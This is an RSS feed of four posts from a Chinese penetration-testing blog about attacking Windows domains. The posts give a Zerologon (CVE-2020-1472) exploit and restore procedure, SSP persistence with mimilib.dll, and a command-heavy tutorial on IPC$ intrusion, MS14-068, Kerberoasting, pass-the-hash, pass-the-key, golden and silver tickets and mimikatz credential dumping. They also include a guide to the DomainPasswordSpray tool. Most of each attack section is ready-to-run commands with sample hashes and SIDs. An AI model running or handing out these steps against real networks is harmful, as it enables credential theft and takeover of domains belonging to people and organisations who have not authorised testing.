<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>域渗透 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Tue, 15 Sep 2020 01:38:51 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>CVE-2020-1472 POC</title>
		<link>/tools/1865.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 15 Sep 2020 01:35:11 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[exp]]></category>
		<category><![CDATA[域渗透]]></category>
		<category><![CDATA[工具]]></category>
		<guid isPermaLink="false">/?p=1865</guid>

					<description><![CDATA[https://github.com/dirkjanm/CVE-2020-1472 Requires the latest impacket from GitHub with ad...]]></description>
										<content:encoded><![CDATA[<p>https://github.com/dirkjanm/CVE-2020-1472</p>
<p>Requires the latest impacket from <a class="wp-editor-md-post-content-link" href="https://github.com/SecureAuthCorp/impacket">GitHub</a> with added netlogon structures.</p>
<p>Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this!</p>
<p>More info and original research <a class="wp-editor-md-post-content-link" href="https://www.secura.com/blog/zero-logon">here</a></p>
<h2>Exploit steps</h2>
<ul>
<li>Read the blog/whitepaper above so you know what you&#8217;re doing</li>
<li>Run <code><span class="wpcom_tag_link"><a href="/tags/cve" title="cve" target="_blank">cve</a></span>-2020-1472-<span class="wpcom_tag_link"><a href="/tags/exp" title="exp" target="_blank">exp</a></span>loit.py</code> with IP and netbios name of DC</li>
<li>DCSync with secretsdump, using <code>-just-dc</code> and <code>-no-pass</code> or empty hashes and the <code>DCHOSTNAME$</code> account</li>
</ul>
<h2>Restore steps</h2>
<p>If you make sure that <a class="wp-editor-md-post-content-link" href="https://github.com/SecureAuthCorp/impacket/blob/64ce46580286b5ab15a4737bddf85201ce2adde3/impacket/examples/secretsdump.py#L1530">this line</a> in secretsdump passes (so make it <code>if True:</code> for example) secretsdump will also dump the plaintext (hex encoded) machine account password from the registry. You can do this by running it against the same DC and using a DA account.</p>
<p>Alternatively you can dump this same password by first extracting the registry hives and then running secretsdump offline (it will then always print the plaintext key because it can&#8217;t calculate the Kerberos hashes, this saves you modifying the library).</p>
<p>With this password you can run <code>restorepassword.py</code> with the <code>-hexpass</code> parameter. This will first authenticate with the empty password to the same DC and then set the password back to the original one. Make sure you supply the netbios name and IP again as target, so for example:</p>
<pre><code class="line-numbers">python restorepassword.py testsegment/s2016dc@s2016dc -target-ip 192.168.222.113 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3...etc
</code></pre>
<p><img src="/wp-content/uploads/2020/09/8024de24-ca3f-e0f9-2821-a65231c2896e-3.png" alt="image.png" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>域维权- Security Support Provider</title>
		<link>/web/1257.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Mon, 24 Feb 2020 04:17:36 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[域渗透]]></category>
		<guid isPermaLink="false">/?p=1257</guid>

					<description><![CDATA[Security Support Provider 简介 来源： Security Support Provider SSP： Security Support Provider，...]]></description>
										<content:encoded><![CDATA[<h1>Security Support Provider</h1>
<h2>简介</h2>
<p><strong>来源：</strong><br />
<a class="wp-editor-md-post-content-link" href="https://wooyun.js.org/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Security%20Support%20Provider.html">Security Support Provider</a></p>
<blockquote><p>
  SSP：<br />
  Security Support Provider，直译为安全支持提供者，又名Security Package.简单的理解为SSP就是一个DLL，用来实现身份认证</p>
<p>  SSPI：<br />
  Security Support Provider Interface，直译为安全支持提供程序接口，是Windows系统在执行认证操作所使用的API。简单的理解为SSPI是SSP的API接口</p>
<p>  LSA：<br />
  Local Security Authority，用于身份认证，常见进程为lsass.exe.特别的地方在于LSA是可扩展的，在系统启动的时候SSP会被加载到进程lsass.exe中.<br />
  这相当于我们可以自定义一个dll，在系统启动的时候被加载到进程lsass.exe！
</p></blockquote>
<h2>测试</h2>
<h3>使用注册表</h3>
<ul>
<li>添加SSP<br />
<img src="/wp-content/uploads/2020/02/5d4d38d4451253d1780a02d3-1.jpg" alt="" /></p>
</li>
<li>
<p>修改注册表位置<br />
<img src="/wp-content/uploads/2020/02/5d4d38d4451253d1780a02d3-1.jpg" alt="" /></p>
</li>
<li>
<p>添加mimilib.dll<br />
<img src="/wp-content/uploads/2020/02/5d4d39f7451253d1780a11a2-1.jpg" alt="" /></p>
</li>
<li>
<p>重启系统验证<br />
<img src="/wp-content/uploads/2020/02/5d4d3bd8451253d1780a2484-1.jpg" alt="" /></p>
</li>
</ul>
<h3>进程注入（重启失效）</h3>
<p><img src="/wp-content/uploads/2020/02/5d4d3c46451253d1780a2868-1.jpg" alt="" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>域渗透之IPC MS14068 Pth Ptt Ptk Kerberoating</title>
		<link>/web/686.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 08 Aug 2019 01:14:46 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[Kerberos]]></category>
		<category><![CDATA[ms14068]]></category>
		<category><![CDATA[pth]]></category>
		<category><![CDATA[ptk]]></category>
		<category><![CDATA[ptt]]></category>
		<category><![CDATA[域渗透]]></category>
		<guid isPermaLink="false">/?p=686</guid>

					<description><![CDATA[IPC IPC$入侵 建立非空连接 新建批处理 Copy命令上传 查看目标靶机时间 通过at命令在特定时间执行批处理文件 在目标靶机上查看 其他命令 将目标共享建立一个映射g盘 n...]]></description>
										<content:encoded><![CDATA[<h1>IPC</h1>
<h2>IPC$入侵</h2>
<ul>
<li>建立非空连接<br />
<img src="https://ae01.alicdn.com/kf/H7de99dac099e4694966204a93871c634o.jpg" alt="" /></p>
</li>
<li>
<p>新建批处理<br />
<img src="https://ae01.alicdn.com/kf/H6daf7be4713d4b5c9171df8d753fbf6eK.jpg" alt="" /></p>
</li>
<li>
<p>Copy命令上传<br />
<img src="https://ae01.alicdn.com/kf/Heb36bd75a778479584c35b41049f54438.jpg" alt="" /></p>
</li>
<li>
<p>查看目标靶机时间<br />
<img src="https://ae01.alicdn.com/kf/Haec412d7ef12423b9163b8592fd2e8fcS.jpg" alt="" /></p>
</li>
<li>
<p>通过at命令在特定时间执行批处理文件<br />
<img src="https://ae01.alicdn.com/kf/Hc8924d6008ba497ebe4318670297d786v.jpg" alt="" /></p>
</li>
<li>
<p>在目标靶机上查看<br />
<img src="https://ae01.alicdn.com/kf/H8cc8f0e34be1490dada5fe6f28dbe9b0D.jpg" alt="" /></p>
</li>
</ul>
<h2>其他命令</h2>
<ul>
<li>
<p>将目标共享建立一个映射g盘<br />
<code>net use g: \\192.168.3.68\c$</code><br />
<img src="https://ae01.alicdn.com/kf/H8cc8f0e34be1490dada5fe6f28dbe9b0D.jpg" alt="" /></p>
</li>
<li>
<p>查看已建立的会话<br />
<img src="https://ae01.alicdn.com/kf/H01d751f3dd924bffab1af18d1105e807t.jpg" alt="" /></p>
</li>
</ul>
<h3>通过工具进行会话连接执行</h3>
<pre><code class="">psexec.exe  \\192.168.1.108   cmd  -uadministrator   -p  123456
</code></pre>
<pre><code class="">csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456
</code></pre>
<p><strong>返回一个cmd交互界面执行即可</strong></p>
<h1>MS14068</h1>
<ul>
<li>首先尝试访问域控共享文件夹<br />
<img src="https://ae01.alicdn.com/kf/HTB1.IzPdL5G3KVjSZPxq6zI3XXax.jpg" alt="" /><br />
<strong>拒绝访问</strong></p>
</li>
<li>
<p>使用ms16048</p>
</li>
</ul>
<p><code>-u 域账号+@+域名称</code><br />
<code>-p 为当前用户的密码，即 ts1 的密码</code><br />
<code>-s 为 ts1 的 SID 值，可以通过 whoami /all 来获取用户的 SID 值 -d 为当前域的域控</code></p>
<ul>
<li>生成ccache文件<br />
<img src="https://ae01.alicdn.com/kf/HTB13G2TdLWG3KVjSZFPq6xaiXXa9.jpg" alt="" /></p>
</li>
<li>
<p>删除当前缓存的kerboeos票据<br />
<code>kerberos::purge</code><br />
<img src="https://ae01.alicdn.com/kf/HTB1d2L1dRGw3KVjSZFDq6xWEpXaL.jpg" alt="" /></p>
</li>
<li>
<p>导入ccache文件<br />
<code>kerberos::ptc</code><br />
<img src="https://ae01.alicdn.com/kf/HTB1lGYVdL1G3KVjSZFkq6yK4XXap.jpg" alt="" /></p>
</li>
<li>
<p>再次访问域控共享文件<br />
<img src="https://ae01.alicdn.com/kf/HTB19EDHcAxz61VjSZFtq6yDSVXaD.jpg" alt="" /></p>
</li>
</ul>
<h1>Kerberoating</h1>
<h2>早期kerberoating</h2>
<blockquote>
<p>工具 Kerberoast工具包 Mimikatz
</p></blockquote>
<ul>
<li>使用Kerberoast工具包GetUserPNs.ps1进行SPN扫描</li>
</ul>
<p><img src="https://ae01.alicdn.com/kf/HTB1wyjxdMmH3KVjSZKzq6z2OXXaM.jpg" alt="" /></p>
<ul>
<li>根据微软提供的类<span class="wpcom_tag_link"><a href="/tags/kerberos" title="Kerberos" target="_blank">Kerberos</a></span>RequeststorSecurityToken发起Kerberos请求申请票据<br />
<code>Add-Type -AssemblyName System.IdentityModel</code><br />
<code>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SRC_DB_ODAY.org:1433"</code><br />
<img src="https://ae01.alicdn.com/kf/HTB1n46CdQWE3KVjSZSyq6xocXXa0.jpg" alt="" /></p>
</li>
<li>
<p>通过klist命令查看当前会话存储的Kerberos票据<br />
<code>klist</code><br />
<img src="https://ae01.alicdn.com/kf/HTB1NyzJdHus3KVjSZKbq6xqkFXaG.jpg" alt="" /></p>
</li>
<li>
<p>使用mimikatz导出<br />
<code>kerberos::list /export</code><br />
<img src="https://ae01.alicdn.com/kf/HTB1FB3Na2Bj_uVjSZFpq6A0SXXaf.jpg" alt="" /></p>
</li>
<li>
<p>使用kerberoast 工具集中的 tgsrepcrack.py 工具进行离线爆破<br />
<code>python tgsrepcrack.py list1.txt 2-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi</code><br />
<img src="https://ae01.alicdn.com/kf/HTB16NnDdUWF3KVjSZPhq6xclXXaU.jpg" alt="" /></p>
</li>
</ul>
<h2>kerberoating新姿势</h2>
<blockquote>
<p>工具 Invoke-Kerberoast.ps1 HashCat
</p></blockquote>
<ul>
<li>转为Hashcat格式<br />
<code>Invoke-kerberoast –outputformat hashcat | fl</code><br />
<img src="https://ae01.alicdn.com/kf/HTB13mzYdUGF3KVjSZFoq6zmpFXaB.jpg" alt="" /></li>
<li>保存<br />
<code>nvoke-Kerberoast -Outputformat Hashcat | fl &gt; test1.txt</code></p>
</li>
<li>
<p>Hashcat爆破<br />
<code>hashcat64.exe –m 13100 test1.txt password.list --force</code><img src="https://ae01.alicdn.com/kf/HTB19sMbdG5s3KVjSZFNq6AD3FXa9.jpg" alt="" /></p>
</li>
</ul>
<h1>Pth</h1>
<h2>Pass the hash</h2>
<ul>
<li>使用mimikatz先获取hash</li>
</ul>
<pre><code class="">privilege::debug
</code></pre>
<pre><code class="">sekurlsa::logonpasswords
</code></pre>
<p><img src="https://ae01.alicdn.com/kf/H5b1de26684c14fac9a0301ee533e168d3.jpg" alt="" /></p>
<ul>
<li>攻击机执行</li>
</ul>
<pre><code class="">mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:SRV-DB-0DAY /ntlm:ac307fdeab3e8307c3892c163a7808d5"
</code></pre>
<p><img src="https://pic1.superbed.cn/item/5d4b9eb3451253d178f061a6.jpg" alt="" /></p>
<ul>
<li>验证<span class="wpcom_tag_link"><a href="/tags/pth" title="pth" target="_blank">pth</a></span></li>
</ul>
<p><img src="https://pic3.superbed.cn/item/5d4b9f15451253d178f07075.jpg" alt="" /></p>
<h2>wmiexec</h2>
<ul>
<li>Invoke-SMBExec</li>
</ul>
<pre><code class="">https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose
</code></pre>
<ul>
<li>Invoke-SMBExec</li>
</ul>
<pre><code class="">Invoke-SMBExec -Target 192.168.3.21 -Domain test.local -Username test1 -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose
</code></pre>
<p><strong>如果只有SMB文件共享的权限，没有远程执行权限，可以使用该脚本</strong></p>
<ul>
<li>wmiexec.py</li>
</ul>
<pre><code class="">https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

https://github.com/maaaaz/impacket-examples-windows
</code></pre>
<pre><code class="">wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/administrator@192.168.3.21 "whoami"
</code></pre>
<p><strong>普通用户可用</strong></p>
<h2>CrackMapExec</h2>
<pre><code class="">https://github.com/byt3bl33d3r/CrackMapExec.git
</code></pre>
<pre><code class="">crackmapexec 192.168.3.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7
</code></pre>
<h1>Ptk</h1>
<blockquote><p>
  <strong>对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012，可以使用AES keys代替NT hash</strong>
</p></blockquote>
<ul>
<li>获取用户的aes key</li>
</ul>
<pre><code class="">mimikatz "privilege::debug" "sekurlsa::ekeys"
</code></pre>
<p><img src="https://pic3.superbed.cn/item/5d4ba498451253d178f12f17.jpg" alt="" /></p>
<ul>
<li>注入aes key</li>
</ul>
<pre><code class="">mimikatz "privilege::debug" "sekurlsa::pth /user:sqlsvr /domain:0DAY.ORG /aes256:bf2cab4e27a426c9ec9d21c919f119843415ee5d98587063d6e48d16633c5436" 
</code></pre>
<p><img src="https://pic.superbed.cn/item/5d4ba588451253d178f15100.jpg" alt="" /></p>
<h1>Ptt</h1>
<h2>Golden ticket(黄金票据)</h2>
<blockquote><p>
  前提：<br />
  域名称<br />
  域SID<br />
  krbtgt账户密码<br />
  伪造用户名
</p></blockquote>
<ul>
<li>dump krbtgt hash</li>
</ul>
<pre><code class="">privilege::debug
lsadump::lsa /patch
</code></pre>
<p><img src="https://pic.superbed.cn/item/5d4bad1c451253d178f25b74.jpg" alt="" /></p>
<ul>
<li>生成ticket</li>
</ul>
<pre><code class="">kerberos::golden  /admin:administrator  /domain:0day.org /sid: S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2  /ticket:test.kiribi
</code></pre>
<p><img src="https://pic3.superbed.cn/item/5d4bba48451253d178f43e9a.jpg" alt="" /></p>
<ul>
<li>注入凭据</li>
</ul>
<pre><code class="">kerberos::ptt test.kirbi
</code></pre>
<p><img src="https://pic.superbed.cn/item/5d4bc27c451253d178f576dc.jpg" alt="" /><br />
&#8211; 验证Golden ticket</p>
<p><img src="https://pic.superbed.cn/item/5d4bc45b451253d178f5ba55.jpg" alt="" /></p>
<h2>golden ticket（白银票据）</h2>
<blockquote><p>
  前提：<br />
  域名称<br />
  域SID<br />
  域的服务账户的密码hash<br />
  伪造用户名
</p></blockquote>
<ul>
<li>dump server hash</li>
</ul>
<pre><code class="">privilege::debug
sekurlsa::logonpasswords
</code></pre>
<p><img src="https://pic3.superbed.cn/item/5d4bc7b5451253d178f63419.jpg" alt="" /></p>
<ul>
<li>导入凭证</li>
</ul>
<pre><code class="">kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:192.168.3.142 /rc4:74cca677f85c7c566352fd846eb0d82a  /service:cifs /user:syst1m /ptt
</code></pre>
<ul>
<li>验证</li>
</ul>
<p><img src="https://pic.superbed.cn/item/5d4bd4a9451253d178f7fe27.jpg" alt="" /></p>
<h1>Tips</h1>
<pre><code class="">mimikatz复制粘贴困难，可使用如&gt;&gt;log.txt
</code></pre>
<pre><code class="">exploit/windows/smb/psexec 使用hash传递
</code></pre>
<pre><code class="">post/windows/gather/smart_hashdump 读取hash
</code></pre>
<pre><code class="">.domain_list_gen 获取域管理账户列表
</code></pre>
<pre><code class="">auxiliary/gather/kerberos_enumusers 用户名枚举
</code></pre>
<pre><code class="">auxiliary/admin/kerberos/ms14_068_kerberos_checksum 14068
</code></pre>
<pre><code class="">load kiwi
kerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi kiwi扩展来导入TGT票证
参考：https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/
</code></pre>
<ul>
<li>Mimikatz</li>
</ul>
<pre><code class="">load mimikatz 加载
mimikatz_command -f version  版本
mimikatz_command -f fu 获取可用模块列表
msv 检索msv凭证
wdigest 读取密码
kerberos 尝试检索kerberos凭据
</code></pre>
<p>看到了再加～</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>域渗透之DomainPasswordSpray</title>
		<link>/tools/411.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 08 May 2018 14:12:00 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[域渗透]]></category>
		<category><![CDATA[密码]]></category>
		<category><![CDATA[枚举]]></category>
		<category><![CDATA[用户]]></category>
		<guid isPermaLink="false">/?p=351</guid>

					<description><![CDATA[前言 在拿到一台内网服务器之后，想要进行进一步的域渗透时，如果在内网中有着庞大的用户列表，你会怎么办？ powershell脚本 DomainPasswordSpray是一个pow...]]></description>
										<content:encoded><![CDATA[<h1>前言</h1>
<p>在拿到一台内网服务器之后，想要进行进一步的<span class="wpcom_tag_link"><a href="/tags/%e5%9f%9f%e6%b8%97%e9%80%8f" title="域渗透" target="_blank">域渗透</a></span>时，如果在内网中有着庞大的<span class="wpcom_tag_link"><a href="/tags/%e7%94%a8%e6%88%b7" title="用户" target="_blank">用户</a></span>列表，你会怎么办？</p>
<h1>powershell脚本</h1>
<p><strong>DomainPasswordSpray</strong>是一个powershell脚本，主要原理是先来抓取域用户账号，然后指定<span class="wpcom_tag_link"><a href="/tags/%e5%af%86%e7%a0%81" title="密码" target="_blank">密码</a></span>字典进行域认证。认证通过的就是密码正确的了。</p>
<p><a href="https://github.com/dafthack/DomainPasswordSpray">Github地址</a></p>
<p>贴出了<a href="http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt">@倾旋大佬优化后的ps1脚本</a></p>
<h1>简单使用</h1>
<pre><code class="lang-powershell">Invoke-DomainPasswordSpray -Password chabug</code></pre>
<p>这个命令会从当前的域中生成用户列表，然后将每个用户名和<code>chabug</code>的密码组合进行<span class="wpcom_tag_link"><a href="/tags/%e6%9e%9a%e4%b8%be" title="枚举" target="_blank">枚举</a></span>认证。</p>
<h1>参数详解</h1>
<ul>
<li><code>Domain</code> 指定要测试的域名</li>
<li><code>RemoveDisabled</code> 尝试从用户列表删除禁用的账户</li>
<li><code>RemovePotentialLockouts</code> 删除锁定账户</li>
<li><code>UserList</code> 自定义用户列表(字典)。 如果未指定，这将自动从域中获取</li>
<li><code>Password</code> 指定单个密码进行口令测试</li>
<li><code>PasswordList</code> 指定一个密码字典</li>
<li><code>OutFile</code> 将结果保存到某个文件</li>
<li><code>Force</code> 当枚举出第一个后继续枚举，不询问</li>
</ul>
<h1>使用例子</h1>
<pre><code>C:\PS&gt; Get-DomainUserList</code></pre>
<p>该命令将从域中收集用户列表。</p>
<pre><code>C:\PS&gt; Get-DomainUserList -Domain 域名 -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt</code></pre>
<p>该命令将收集域“域名”中的用户列表，包括任何未被禁用且未接近锁定状态的帐户。 它会将结果写&#8220;入“userlist.txt”文件中</p>
<pre><code>C:\PS&gt; Invoke-DomainPasswordSpray -Password Winter2016</code></pre>
<p>该命令将会从域环境中获取用户名，然后逐个以密码<code>Winter2016</code>进行认证枚举</p>
<pre><code>C:\PS&gt; Invoke-DomainPasswordSpray -UserList users.txt -Domain 域名 -PasswordList passlist.txt -OutFile sprayed-creds.txt</code></pre>
<p>该命令将会从<code>users.txt</code>中提取用户名，与<code>passlist.txt</code>中的密码对照成一对口令，进行域认证枚举，登录成功的结果将会输出到<code>sprayed-creds.txt</code></p>
<p><strong>希望对你的渗透之路有帮助。</strong></p>
<p>本文引用或涉及的文章链接：</p>
<p><a href="http://payloads.online/archivers/2018-05-02/1">http://payloads.online/archivers/2018-05-02/1</a></p>
<p><a href="http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt">http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt</a></p>
<p><a href="https://github.com/dafthack/DomainPasswordSpray">https://github.com/dafthack/DomainPasswordSpray</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
